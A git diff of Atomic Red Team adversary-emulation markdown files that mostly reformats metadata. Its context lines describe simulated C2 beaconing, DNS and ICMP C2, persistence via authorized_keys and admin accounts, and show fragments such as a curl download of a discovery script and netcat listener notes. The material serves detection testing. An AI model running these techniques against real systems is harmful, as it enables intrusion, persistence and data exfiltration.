## Atomic Test #1 - Indicator Removal using FSUtil - -auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435 - Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn + **Supported Platforms:** Windows +**auto_generated_guid:** b4115c7a-0e92-47f0-a61e-17e7218b2435 + + + diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md index 58a4fe43..8722d0bc 100644 --- a/atomics/T1071.001/T1071.001.md +++ b/atomics/T1071.001/T1071.001.md @@ -16,16 +16,18 @@ Protocols such as HTTP and HTTPS that carry web traffic may be very common in en
## Atomic Test #1 - Malicious User Agents - Powershell - -auto_generated_guid: 81c13829-f6c9-45b8-85a6-053366d55297 - This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Windows +**auto_generated_guid:** 81c13829-f6c9-45b8-85a6-053366d55297 + + + #### Inputs: @@ -53,16 +55,18 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
## Atomic Test #2 - Malicious User Agents - CMD - -auto_generated_guid: dc3488b0-08c7-4fea-b585-905c83b48180 - This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Windows +**auto_generated_guid:** dc3488b0-08c7-4fea-b585-905c83b48180 + + + #### Inputs: @@ -107,14 +111,16 @@ Remove-Item $env:temp\curl.zip
## Atomic Test #3 - Malicious User Agents - Nix - -auto_generated_guid: 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 - This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 + + + #### Inputs: diff --git a/atomics/T1071.004/T1071.004.md b/atomics/T1071.004/T1071.004.md index 17f935e4..d637d611 100644 --- a/atomics/T1071.004/T1071.004.md +++ b/atomics/T1071.004/T1071.004.md @@ -18,15 +18,17 @@ The DNS protocol serves an administrative function in computer networking and th
## Atomic Test #1 - DNS Large Query Volume - -auto_generated_guid: 1700f5d6-5a44-487b-84de-bc66f507b0a6 - This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** 1700f5d6-5a44-487b-84de-bc66f507b0a6 + + + #### Inputs: @@ -54,15 +56,17 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #2 - DNS Regular Beaconing - -auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 - This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 + + + #### Inputs: @@ -93,15 +97,17 @@ Set-Location PathToAtomicsFolder
## Atomic Test #3 - DNS Long Domain Query - -auto_generated_guid: fef31710-223a-40ee-8462-a396d6b66978 - This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout. + **Supported Platforms:** Windows +**auto_generated_guid:** fef31710-223a-40ee-8462-a396d6b66978 + + + #### Inputs: @@ -129,18 +135,20 @@ Set-Location PathToAtomicsFolder
## Atomic Test #4 - DNS C2 - -auto_generated_guid: e7bf9802-2e78-4db9-93b5-181b7bcd37d7 - This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell + **Supported Platforms:** Windows +**auto_generated_guid:** e7bf9802-2e78-4db9-93b5-181b7bcd37d7 + + + #### Inputs: diff --git a/atomics/T1072/T1072.md b/atomics/T1072/T1072.md index 7148ce67..e4d9008d 100644 --- a/atomics/T1072/T1072.md +++ b/atomics/T1072/T1072.md @@ -14,13 +14,15 @@ The permissions required for this action vary by system configuration; local cre
## Atomic Test #1 - Radmin Viewer Utility - -auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 - An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. + **Supported Platforms:** Windows +**auto_generated_guid:** b4988cad-6ed2-434d-ace5-ea2670782129 + + + #### Inputs: diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 99d5bd9a..18147371 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -14,14 +14,16 @@
## Atomic Test #1 - Stage data from Discovery.bat - -auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f - Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 107706a5-6f9f-451a-adae-bab8c667829f + + + #### Inputs: @@ -50,13 +52,15 @@ Remove-Item -Force #{output_file} -ErrorAction Ignore
## Atomic Test #2 - Stage data from Discovery.sh - -auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 - Utilize curl to download discovery.sh and execute a basic information gathering shell script + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 39ce0303-ae16-4b9e-bb5b-4f53e8262066 + + + #### Inputs: @@ -81,14 +85,16 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp - -auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a - Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** a57fbe4b-3440-452a-88a7-943531ac872a + + + #### Inputs: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 3f1b6291..3d3aef89 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -12,14 +12,16 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges - -auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections. + **Supported Platforms:** Windows +**auto_generated_guid:** 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 + + + #### Inputs: diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 88b2cf6e..5bc00429 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -12,13 +12,15 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
## Atomic Test #1 - Create local account with admin priviliges - -auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 - After execution the new account will be active and added to the Administrators group + **Supported Platforms:** Windows +**auto_generated_guid:** a524ce99-86de-4db6-b4f9-e08f35a47a15 + + + diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 579b4cce..d83db839 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -34,13 +34,15 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
## Atomic Test #1 - System Information Discovery - -auto_generated_guid: 66703791-c902-4560-8770-42b8a91f7667 - Identify System Info. Upon execution, system info and time info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 66703791-c902-4560-8770-42b8a91f7667 + + + @@ -61,13 +63,15 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
## Atomic Test #2 - System Information Discovery - -auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 - Identify System Info + **Supported Platforms:** macOS +**auto_generated_guid:** edff98ec-0f73-4f63-9890-6b117092aff6 + + + @@ -88,13 +92,15 @@ ls -al /Applications
## Atomic Test #3 - List OS Information - -auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c - Identify System Info + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c + + + #### Inputs: @@ -128,13 +134,15 @@ rm #{output_file} 2>/dev/null
## Atomic Test #4 - Linux VM Check via Hardware - -auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec - Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. + **Supported Platforms:** Linux +**auto_generated_guid:** 31dad7ad-2286-4c02-ae92-274418c85fec + + + @@ -161,13 +169,15 @@ if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
## Atomic Test #5 - Linux VM Check via Kernel Modules - -auto_generated_guid: 8057d484-0fae-49a4-8302-4812c4f1e64e - Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. + **Supported Platforms:** Linux +**auto_generated_guid:** 8057d484-0fae-49a4-8302-4812c4f1e64e + + + @@ -191,13 +201,15 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
## Atomic Test #6 - Hostname Discovery (Windows) - -auto_generated_guid: 85cfbf23-4a1e-4342-8792-007e004b975f - Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 85cfbf23-4a1e-4342-8792-007e004b975f + + + @@ -217,13 +229,15 @@ hostname
## Atomic Test #7 - Hostname Discovery - -auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 - Identify system hostname for Linux and macOS systems. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133 + + + @@ -243,13 +257,15 @@ hostname
## Atomic Test #8 - Windows MachineGUID Discovery - -auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 - Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 224b4daf-db44-404e-b6b2-f4d1f0126ef8 + + + @@ -269,16 +285,18 @@ REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
## Atomic Test #9 - Griffon Recon - -auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 - Griffon is a sophisticated tool believed to be in use by one of more "APT" groups. This atomic is for detecting, specifically, the reconnaissance part of the tool. This script used here was reduced by security researcher Kirk Sayre (github.com/kirk-sayre-work/1a9476e7708ed650508f9fb5adfbad9d), and it gives the exact same recon behavior as the original (minus the C2 interaction). For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon and https://attack.mitre.org/software/S0417/ + **Supported Platforms:** Windows +**auto_generated_guid:** 69bd4abe-8759-49a6-8d21-0f15822d6370 + + + #### Inputs: @@ -303,13 +321,15 @@ cscript #{vbscript}
## Atomic Test #10 - Environment variables discovery on windows - -auto_generated_guid: f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 - Identify all environment variables. Upon execution, environments variables and your path info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 + + + @@ -329,13 +349,15 @@ set
## Atomic Test #11 - Environment variables discovery on macos and linux - -auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 - Identify all environment variables. Upon execution, environments variables and your path info will be displayed. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720 + + + diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 7bd81b17..6003c66b 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -18,14 +18,16 @@ Many command shell utilities can be used to obtain this information. Examples in
## Atomic Test #1 - File and Directory Discovery (cmd.exe) - -auto_generated_guid: 0e36303b-6762-4500-b003-127743b80ba6 - Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of all of the data discovery commands. + **Supported Platforms:** Windows +**auto_generated_guid:** 0e36303b-6762-4500-b003-127743b80ba6 + + + @@ -51,13 +53,15 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell) - -auto_generated_guid: 2158908e-b7ef-4c21-8a83-3ce4dd05a924 - Find or discover files on the file system. Upon execution, file and folder information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 2158908e-b7ef-4c21-8a83-3ce4dd05a924 + + + @@ -79,9 +83,6 @@ gci -recurse
## Atomic Test #3 - Nix File and Diectory Discovery - -auto_generated_guid: ffc8b249-372a-4b74-adcd-e4c0430842de - Find or discover files on the file system References: @@ -89,9 +90,14 @@ References: http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/ + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de + + + #### Inputs: @@ -127,13 +133,15 @@ rm #{output_file}
## Atomic Test #4 - Nix File and Directory Discovery 2 - -auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e - Find or discover files on the file system + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e + + + #### Inputs: diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index 98eebaf4..065f757c 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -32,13 +32,15 @@ Commands such as net user and net localgroup of the [N
## Atomic Test #1 - Enumerate all accounts (Local) - -auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f - Enumerate all accounts by copying /etc/passwd to another file + **Supported Platforms:** Linux +**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f + + + #### Inputs: @@ -68,13 +70,15 @@ rm -f #{output_file}
## Atomic Test #2 - View sudoers access - -auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 - (requires root) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2 + + + #### Inputs: @@ -104,13 +108,15 @@ rm -f #{output_file}
## Atomic Test #3 - View accounts with UID 0 - -auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 - View accounts with UID 0 + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397 + + + #### Inputs: @@ -140,13 +146,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List opened files by user - -auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb - List opened files by user + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb + + + @@ -166,13 +174,15 @@ username=$(id -u -n) && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely - -auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 - Show if a user account has ever logged in remotely + **Supported Platforms:** Linux +**auto_generated_guid:** 0f0b6a29-08c3-44ad-a30b-47fd996b2110 + + + #### Inputs: @@ -214,13 +224,15 @@ echo "Install lastlog on the machine to run the test."; exit 1;
## Atomic Test #6 - Enumerate users and groups - -auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e - Utilize groups and id to enumerate users and groups + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e + + + @@ -241,13 +253,15 @@ id
## Atomic Test #7 - Enumerate users and groups - -auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 - Utilize local utilities to enumerate users and groups + **Supported Platforms:** macOS +**auto_generated_guid:** 319e9f6c-7a9e-432e-8c62-9385c803b6f2 + + + @@ -271,14 +285,16 @@ dscacheutil -q user
## Atomic Test #8 - Enumerate all accounts on Windows (Local) - -auto_generated_guid: 80887bec-5a9b-4efc-a81d-f83eb2eb32ab - Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session + **Supported Platforms:** Windows +**auto_generated_guid:** 80887bec-5a9b-4efc-a81d-f83eb2eb32ab + + + @@ -302,13 +318,15 @@ net localgroup
## Atomic Test #9 - Enumerate all accounts via PowerShell (Local) - -auto_generated_guid: ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b - Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b + + + @@ -336,13 +354,15 @@ net localgroup
## Atomic Test #10 - Enumerate logged on users via CMD (Local) - -auto_generated_guid: a138085e-bfe5-46ba-a242-74a6fb884af3 - Enumerate logged on users. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a138085e-bfe5-46ba-a242-74a6fb884af3 + + + @@ -362,13 +382,15 @@ query user
## Atomic Test #11 - Enumerate logged on users via PowerShell - -auto_generated_guid: 2bdc42c7-8907-40c2-9c2b-42919a00fe03 - Enumerate logged on users via PowerShell. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 2bdc42c7-8907-40c2-9c2b-42919a00fe03 + + + diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 8949d5be..02fd9e3e 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -30,14 +30,16 @@ Commands such as net user /domain and net group /domain ## Atomic Test #1 - Enumerate all accounts (Domain) - -auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e - Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session + **Supported Platforms:** Windows +**auto_generated_guid:** 6fbc9e68-5ad7-444a-bd11-8bf3136c477e + + + @@ -58,13 +60,15 @@ net group /domain
## Atomic Test #2 - Enumerate all accounts via PowerShell (Domain) - -auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2 - Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8b8a6449-be98-4f42-afd2-dedddc7453b2 + + + @@ -86,13 +90,15 @@ get-aduser -filter *
## Atomic Test #3 - Enumerate logged on users via CMD (Domain) - -auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7 - Enumerate logged on users. Upon exeuction, logged on users will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 161dcd85-d014-4f5e-900c-d3eaae82a0f7 + + + #### Inputs: @@ -117,14 +123,16 @@ query user /SERVER:#{computer_name}
## Atomic Test #4 - Automated AD Recon (ADRecon) - -auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 - ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 95018438-454a-468c-a0fa-59c800149b59 + + + #### Inputs: @@ -166,14 +174,16 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe
## Atomic Test #5 - Adfind -Listing password policy - -auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 - Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx + **Supported Platforms:** Windows +**auto_generated_guid:** 736b4f53-f400-4c22-855d-1a6b5a551600 + + + #### Inputs: @@ -210,14 +220,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #6 - Adfind - Enumerate Active Directory Admins - -auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ + **Supported Platforms:** Windows +**auto_generated_guid:** b95fd967-4e62-4109-b48d-265edfd28c3a + + + #### Inputs: @@ -254,14 +266,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Adfind - Enumerate Active Directory User Objects - -auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 + + + #### Inputs: @@ -298,14 +312,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects - -auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 5e2938fb-f919-47b6-8b29-2f6a1f718e99 + + + #### Inputs: @@ -342,13 +358,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #9 - Enumerate Default Domain Admin Details (Domain) - -auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef - This test will enumerate the details of the built-in domain admin account + **Supported Platforms:** Windows +**auto_generated_guid:** c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef + + + @@ -368,16 +386,18 @@ net user administrator /domain
## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation - -auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b - Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user + **Supported Platforms:** Windows +**auto_generated_guid:** 46f8dbe9-22a5-4770-8513-66119c5be63b + + + #### Inputs: diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md index ba88f77c..7e9471af 100644 --- a/atomics/T1090.001/T1090.001.md +++ b/atomics/T1090.001/T1090.001.md @@ -16,15 +16,17 @@ By using a compromised internal system as a proxy, adversaries may conceal the t
## Atomic Test #1 - Connection Proxy - -auto_generated_guid: 0ac21132-4485-4212-a681-349e8a6637cd - Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd + + + #### Inputs: @@ -55,16 +57,18 @@ unset https_proxy
## Atomic Test #2 - Connection Proxy for macOS UI - -auto_generated_guid: 648d68c1-8bcd-4486-9abe-71c6655b6a2c - Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration. + **Supported Platforms:** macOS +**auto_generated_guid:** 648d68c1-8bcd-4486-9abe-71c6655b6a2c + + + #### Inputs: @@ -97,15 +101,17 @@ networksetup -setsecurewebproxystate #{interface} off
## Atomic Test #3 - portproxy reg key - -auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a - Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh netsh interface portproxy show all + **Supported Platforms:** Windows +**auto_generated_guid:** b8223ea9-4be2-44a6-b50a-9657a3d4e72a + + + #### Inputs: diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index 35f06246..998ff39b 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -17,14 +17,16 @@ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Ev
## Atomic Test #1 - ICMP C2 - -auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc - This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ + **Supported Platforms:** Windows +**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc + + + #### Inputs: @@ -50,15 +52,17 @@ Invoke-PowerShellIcmp -IPAddress #{server_ip}
## Atomic Test #2 - Netcat C2 - -auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 - Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p + **Supported Platforms:** Windows +**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 + + + #### Inputs: @@ -106,15 +110,17 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\
## Atomic Test #3 - Powercat C2 - -auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e - Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p + **Supported Platforms:** Windows +**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e + + + #### Inputs: diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md index 6aefc212..e3e11db8 100644 --- a/atomics/T1098.004/T1098.004.md +++ b/atomics/T1098.004/T1098.004.md @@ -12,14 +12,16 @@ Adversaries may modify SSH authorized_keys files directly with scri
## Atomic Test #1 - Modify SSH Authorized Keys - -auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc - Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc + + + diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index b4409385..ff4d250c 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -12,13 +12,15 @@
## Atomic Test #1 - Admin Account Manipulate - -auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af - Manipulate Admin Account Name + **Supported Platforms:** Windows +**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af + + + @@ -64,9 +66,6 @@ foreach($u in $list) {
## Atomic Test #2 - Domain Account and Group Manipulate - -auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 - Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, @@ -79,9 +78,14 @@ service account whose delegation is given onto a dedicated OU for user creation as group manager of the target group. Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` + **Supported Platforms:** Windows +**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + + + #### Inputs: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 4003a30d..caef3d08 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -36,13 +36,15 @@
## Atomic Test #1 - rsync remote file copy (push) - -auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 - Utilize rsync to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409 + + + #### Inputs: @@ -70,13 +72,15 @@ rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #2 - rsync remote file copy (pull) - -auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f - Utilize rsync to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f + + + #### Inputs: @@ -104,13 +108,15 @@ rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
## Atomic Test #3 - scp remote file copy (push) - -auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 - Utilize scp to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344 + + + #### Inputs: @@ -138,13 +144,15 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
